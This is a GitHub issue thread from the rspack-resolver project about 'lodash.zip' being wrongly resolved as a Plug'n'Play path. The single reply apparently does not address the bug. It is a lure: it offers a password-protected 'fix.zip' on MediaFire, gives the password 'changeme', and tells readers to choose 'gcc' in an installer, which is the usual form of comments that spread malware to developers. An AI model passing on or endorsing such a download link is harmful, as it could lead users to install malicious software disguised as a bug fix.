### ISSUE TITLE
[BUG] Unable to Resolve `lodash.zip` Module

### ISSUE THREAD

**Issue by SyMind** [web-infra-dev/rspack-resolver#20]
`lodash.zip` is treated as a PnP path. The relevant code can be found [here](https://github.com/yarnpkg/pnp-rs/blob/main/src/fs.rs#L181).

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
